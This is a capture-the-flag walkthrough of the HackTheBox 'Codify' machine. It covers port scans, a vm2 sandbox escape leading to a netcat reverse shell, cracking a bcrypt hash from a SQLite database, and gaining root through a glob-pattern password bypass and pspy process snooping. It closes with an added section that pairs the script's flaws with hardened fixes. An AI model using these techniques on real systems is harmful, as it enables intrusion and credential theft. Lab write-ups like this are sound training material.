#hackthebox #linux #easy #tjnull

![[Pasted image 20250803004900.png]]

# Information Gathering

As always, I started off with an nmap TCP scan against all ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p- -oN tcpAll
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 02:40 UTC
Nmap scan report for 10.10.11.239
Host is up (0.081s latency).
Not shown: 65389 closed tcp ports (reset), 143 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 18.65 seconds
```

Then another TCP scan against the three open ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 22,80,3000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 02:41 UTC
Nmap scan report for 10.10.11.239
Host is up (0.047s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_  256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp   open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://codify.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
3000/tcp open  http    Node.js Express framework
|_http-title: Codify
Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.87 seconds
```

Finally, a UDP scan against the top 10 ports.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sU --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 02:42 UTC
Nmap scan report for 10.10.11.239
Host is up (0.049s latency).

PORT     STATE  SERVICE
53/udp   closed domain
67/udp   closed dhcps
123/udp  closed ntp
135/udp  closed msrpc
137/udp  closed netbios-ns
138/udp  closed netbios-dgm
161/udp  closed snmp
445/udp  closed microsoft-ds
631/udp  closed ipp
1434/udp closed ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 7.49 seconds
```

# Enumeration

##### HTTP - TCP 80

Before opening up my browser and navigating to the webpage, I mapped the IP address to the domain in the `/etc/hosts` file.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ echo "10.10.11.239 codify.htb" | sudo tee -a /etc/hosts
[sudo] password for kali: 
10.10.11.239 codify.htb
```

The landing page of `codify.htb` looks like below.

![[Pasted image 20250802214540.png]]

As introduced on the landing page, clicking `Try it now` opens a space where you can run your code snippets.

![[Pasted image 20250802221304.png]]

I verified that `node.js` code runs properly.

![[Pasted image 20250802214958.png]]

The website also describes the limitations of the platform.

![[Pasted image 20250802215643.png]]

The `About Us` page tells us that they are using the `vm2` library. Let's search for any known vulnerabilities in the library.

![[Pasted image 20250802221101.png]]

It appears there is a known vulnerability in vm2.

![[Pasted image 20250802221218.png]]

Remember, the platform forbids the use of `child_process`, but that does not mean it cannot be used in the real `node.js` runtime. The published proof of concept escapes the `vm2` sandbox and uses `child_process` from the host runtime.

![[Pasted image 20250802221448.png]]

It successfully ran the `cat /etc/passwd` command.

![[Pasted image 20250802222025.png]]

# Initial Access - Shell as `svc`

I checked that `nc` is installed on the server with `which nc`. However, the `nc -e sh <IP>` command failed to trigger a reverse shell. Therefore, I used the following as an alternative payload.

![[Pasted image 20250802223623.png]]

Connected to the reverse shell as the `svc` user.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.11.239] 60324
sh: 0: can't access tty; job control turned off
$ whoami
svc
```

```bash
svc@codify:/home$ ls
ls
joshua  svc
svc@codify:/home$ cd joshua
cd joshua
bash: cd: joshua: Permission denied
```

# Lateral Movement - Shell as `joshua`

```bash
svc@codify:/var/www/contact$ ls
index.js  package.json  package-lock.json  templates  tickets.db
```

```bash
svc@codify:/var/www/contact$ file tickets.db
tickets.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 17, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 17
```

![[Pasted image 20250802230304.png]]

![[Pasted image 20250802230415.png]]

Even though the hash type matched `bcryptsha512`, it took forever to crack. So I tried the regular bcrypt mode 3200 instead, which cracked the hash and returned the password in plaintext.

![[Pasted image 20250802232219.png]]

```bash
svc@codify:/var/www/contact$ su joshua
Password: 
joshua@codify:/var/www/contact$ whoami
joshua
```

Found `user.txt`.

```bash
joshua@codify:~$ ls
user.txt
joshua@codify:~$ cat user.txt
d78...
```

# Privilege Escalation - Shell as `root`

The `sudo -l` command reveals that `joshua` can run `/opt/scripts/mysql-backup.sh` as `root` with `sudo`.

```bash
joshua@codify:~$ sudo -l
[sudo] password for joshua: 
Matching Defaults entries for joshua on codify:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User joshua may run the following commands on codify:
    (root) /opt/scripts/mysql-backup.sh
```

The following is the content of `mysql-backup.sh`. It contains two main vulnerabilities.

1. `[[ $DB_PASS == $USER_PASS ]]`
   The variables inside the condition should be wrapped in double quotes. Without them, the right-hand side of `==` inside `[[ ]]` is treated as a glob pattern rather than a literal string. When prompted for a password, a user can enter `*`, which matches any value of `$DB_PASS` and bypasses the check.
2. `/usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"`
   The `$DB_PASS` variable is passed directly as a command-line argument. Anyone who monitors running processes while this command executes can read the password in plaintext.

```bash
joshua@codify:~$ cat /opt/scripts/mysql-backup.sh
#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"

read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo

if [[ $DB_PASS == $USER_PASS ]]; then
        /usr/bin/echo "Password confirmed!"
else
        /usr/bin/echo "Password confirmation failed!"
        exit 1
fi

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done

/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'
```

I entered `*` as the password.

```bash
joshua@codify:~$ sudo /opt/scripts/mysql-backup.sh
Enter MySQL password for root: 
Password confirmed!
mysql: [Warning] Using a password on the command line interface can be insecure.
Backing up database: mysql
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
mysqldump: Got error: 1556: You can't use locks with log tables when using LOCK TABLES
Backing up database: sys
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- Warning: column statistics not supported by the server.
All databases backed up successfully!
Changing the permissions
Done!
```

I transferred `pspy` from my Kali machine to the remote host.

![[Pasted image 20250803001417.png]]

I opened another pane, logged in as `joshua`, and executed `sudo /opt/scripts/mysql-backup.sh`. A second later, `pspy` displayed the password in plaintext.

- Why is the password inside the following command not visible in `pspy`?
  `databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")`
- Because

![[Pasted image 20250803001156.png]]

```bash
joshua@codify:~$ su root
Password: 
root@codify:/home/joshua# whoami
root
```

Found `root.txt`.

```bash
root@codify:/home/joshua# cat /root/root.txt
b15...
```
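The two defects in `mysql-backup.sh` from the privilege escalation section, reproduced side by side with the hardened form of each. This is an added example; it is not code from the original writeup or from the Codify box. `SECRET` is a constructed value standing in for `/root/.creds`, and the `check_password_*`, `argv_with_password_*`, `make_mysql_option_file` and `option_file_perms` functions are assumptions made for this demonstration. The fixes shown (quoting the right-hand side of `==`, and passing the credential through a mode-0600 option file with `--defaults-extra-file` instead of `-p`) are the standard remediations for this class of issue.

```shell
#!/bin/sh
# Added example (not part of the original writeup, and not code from the
# Codify box): the two defects in mysql-backup.sh reproduced side by side
# with a hardened version of each. SECRET is a constructed value, not the
# box's real /root/.creds content. bash -c is used so the exact [[ ... ]]
# construct from the script runs even when this file is executed by sh.

SECRET="Constructed-Example-Pass-1"

# Defect 1 as written in the script: inside [[ ]], an unquoted right-hand
# side of == is a glob pattern, so "*" (or "Constructed*") matches any secret.
check_password_vuln() {
    if bash -c '[[ $1 == $2 ]]' _ "$SECRET" "$1"; then
        echo "accepted"
    else
        echo "rejected"
    fi
}

# Fix for defect 1: quoting the right-hand side makes == a literal comparison.
check_password_fixed() {
    if bash -c '[[ "$1" == "$2" ]]' _ "$SECRET" "$1"; then
        echo "accepted"
    else
        echo "rejected"
    fi
}

# Defect 2: -p"$DB_PASS" places the secret in argv, which /proc/<pid>/cmdline
# exposes to every local user (that is what ps and pspy read).
# Returns the argv the script's mysqldump invocation would carry.
argv_with_password_vuln() {
    printf '%s' "mysqldump --force -u root -h 0.0.0.0 -P 3306 -p$SECRET mysql"
}

# Fix for defect 2: put the credential in a mode-0600 option file and pass
# --defaults-extra-file; argv then carries only a path. Prints the file path.
make_mysql_option_file() {
    option_file="$1/backup.cnf"
    (
        umask 077                         # file is created 0600 from the start
        printf '[client]\nuser=root\npassword=%s\n' "$SECRET" > "$option_file"
    )
    printf '%s' "$option_file"
}

argv_with_password_fixed() {
    printf '%s' "mysqldump --defaults-extra-file=$1 --force -h 0.0.0.0 -P 3306 mysql"
}

# Permission string of a file, e.g. "-rw-------" (portable: no stat -c).
option_file_perms() {
    ls -ld "$1" | cut -c1-10
}

# Stand-alone demonstration.
demo_dir="$(mktemp -d)"
echo "vulnerable check with '*':  $(check_password_vuln '*')"
echo "fixed check with '*':       $(check_password_fixed '*')"
echo "fixed check with secret:    $(check_password_fixed "$SECRET")"
echo "argv before: $(argv_with_password_vuln)"
demo_cnf="$(make_mysql_option_file "$demo_dir")"
echo "argv after:  $(argv_with_password_fixed "$demo_cnf")"
echo "option file: $(option_file_perms "$demo_cnf") $demo_cnf"
rm -rf "$demo_dir"
```

The `mysql: [Warning] Using a password on the command line interface can be insecure.` lines in the backup output above are the client flagging defect 2 itself; with the option-file approach that warning disappears because the password never enters argv.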